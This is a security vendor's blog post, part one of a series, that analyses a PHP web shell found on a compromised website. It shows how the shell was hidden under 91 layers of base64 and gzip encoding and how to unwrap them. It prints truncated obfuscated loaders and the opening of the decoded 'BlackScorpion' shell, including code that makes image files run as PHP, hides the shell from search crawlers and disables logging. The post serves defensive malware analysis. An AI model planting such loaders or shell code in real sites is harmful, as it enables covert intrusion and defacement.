• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Down the Malware Rabbit Hole – Part 1

October 3, 2019Cesar Anjos

27
SHARES
FacebookTwitterSubscribe

It’s common for malware to be encoded to hide itself—or its true intentions—but have you ever given thought to what lengths attackers will go to hide their malicious code?

In our first post in this series, we’ll describe how bad actors hide their malicious code and the steps taken to reveal its true form.

Malware Obfuscation in Simple Terms

To begin, you’ll first need to understand a few simple concepts about malware and obfuscation.

  • To hide or obfuscate malware, the the payload is usually encoded. An example of this is seen when using base64 to represent binary data in an ASCII string format).
  • To execute malware, a separate unencoded text tells the programming engine to “read and execute” the malicious code. An example of this is the eval function
  • To decode malware, the execute and/or eval part can simply be removed and instead run like ”read me and print me” to reveal its true form.

The easiest way to achieve this is to replace the code instructions that tell PHP to execute the code with ones that tell it to print. Sounds simple, right?

To elaborate a bit, let’s imagine that the malware is performing an eval function to execute arbitrary PHP code.

eval(malicious code); – The eval function is responsible for executing the malware.

To deobfuscate the snippet, we can replace the eval function with an echo function in the PHP.

echo(malicious code); – The echo function prints the arbitrary code instead of executing it.

Of course, this is an oversimplification of the process… But you get the idea, right?

Malware Deobfuscation: Principles In Action

Now that you know the basics, let’s examine this code that was recently found on a compromised website.

<?php
/*
Thanks For Using
V1
*/
$thanks = "PD9waHAKL[.....truncated.....]DsKPz4=";
eval('?>'.base64_decode($thanks));?>

We can pretty much employ the principles we just discussed to get it to show itself, but the output would result in this:

?><?php
/*
Blackscorpion Obfuscator
From : http://127.0.0.1/myenc.php*/
$error = "error_reporting";
$error(0);
$system = "JGJsY[.....truncated.....]BLCiI7";
$Black_Scorpion= "==waGU3[.....truncated.....]lNgmAwfVDoKA830AyCA";
eval(base64_decode($system));
assert(htmlspecialchars_decode(urldecode(base64_decode($blackie))));
exit ;
?>

You might be thinking, “Okay, we just have to go deeper, right?” Well, on the next step you’d find an even bigger hole:

$blackie = "ZXZhbCUyOCUyNyU[.....truncated.....]SUzQiUwRCUwQQ0K
";
return eval('?>'.gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(gzinflate(gzinflate(gzinflate(gzinflate(gzinflate(base64_decode(strrev(strrev(strrev(strrev(strrev(strrev(strrev($Black_Scorpion))))))))))))))))))))))))))))))))))))))));

Caveat: It’s important to note that in some of these steps, part of the code depends on former variables like $Black_Scorpion, which is seen in the output in the second code block. 

So, let’s keep digging…

?><?php
/*
Blackscorpion Obfuscator
From : http://127.0.0.1/myenc.php*/

$error = "error_reporting";
$error(0);
$system1 = "JH[.....truncated.....]QkxDaUk3IjsK";
$Black_Scorpion= "=gog5FCWwVl[.....truncated.....]YMA8HzAODA"; assert(base64_decode($system1)); assert(base64_decode($system)); $assert = "=oOGfMJANAGQ[.....truncated.....]t4kLssEn49PwA8TA";@assert(gzuncompress(gzinflate(base64_decode(strrev($assert)))));
exit;

You might look at this and think: “What? Isn’t this the same code as we saw before on one of the previous steps?”

It may look like it, but there are some subtle differences—specifically on the large base64 strings.

Malicious Nature Revealed

I could continue to show you how it goes deeper and deeper, but I would need to repeat this  process a total of 91 more times until the code finally reveals itself.

<?php

/*
____  _       _                             _
| __ )| | __ _  ___| | _____ ___ ___  _ __ _ __ (_) ___ _ __
|  _ \| |/ _` |/ __| |/ / __|/ __/ _ \| '__| '_ \| |/ _ \| '_ \
| |_) | | (_| | (__|   <\__ \ (_| (_) | | | |_) | | (_) | | | |
|____/|_|\__,_|\___|_|\_\___/\___\___/|_|  | .__/|_|\___/|_| |_|
|_|

Shell coded by Blackscorpion
Contact:andrewchris1337[at]gmail[.]com
*/

@mkdir('BlackscorpionShell');
$safe_mode = "QWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLXBocCAuanBnCg==";
$mode = fopen(".htaccess","w+");
$write = fwrite ($mode ,base64_decode($safe_mode));
$auth_pass= "02cce9e28a5e94d01b691b733cd5106c"; //ultran00b
$color = "#7effc5";           // For Changing Font Colors
$default_charset = 'Windows-1251'; // For Changing Character Set Available Are

//    UTF-8
//    Windows-1251
//    KOI8-R
//    KOI8-U
//    cp866
// First Encode Your Deface Page to Base64
$defacepage ='PGh0bgegFfq4fwe5wefW[....truncated.....]WdrgfqwdqqwfFdfwefgw+';

$default_action = 'FilesMan';
$default_use_ajax = true;
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@define('Blackscorpion Shell');
symlinkk();
if(get_magic_quotes_gpc()) {
function Blackscorpionstripslashes($array) {
return is_array($array) ? array_map('Blackscorpionstripslashes', $array) : stripslashes($array);
}
$_POST = Blackscorpionstripslashes($_POST);
$_COOKIE = Blackscorpionstripslashes($_COOKIE);
}

function Blackscorpion() {
die ('<!DOCTYPE html>
<html>
<head>
<title>BlackScorpion Shell</title>
<meta charset="UTF-8">
<meta http-equiv="refresh" content="">
<meta name="description" content="Sites description">

[....remaining code removed for reading purposes...]

We could decode a few more strings, but they are just base64-encoded and are simple enough to solve.

Analyzing 91 Layers of Hidden Malware

Now that we have the bulk of what we need to deobfuscate the malware, we can take a moment to analyze why a malicious actor would go to such extreme lengths to hide their code 91 layers deep in the first place. Many possible reasons exist, but most commonly these layers of obfuscation are employed to hide the malware from detection— especially when it’s easy to decode a simple method like this using free online tools.

Stay tuned for more on this topic. In part two, we’ll take a look at the tool used to hide the code and learn a bit more about how attackers encode their malware.

27
SHARES
FacebookTwitterSubscribe

Categories: Security Education, Website Malware Infections, Website SecurityTags: Black Hat Tactics, Hacked Websites, Obfuscation

About Cesar Anjos

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

2019 Threat Report

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.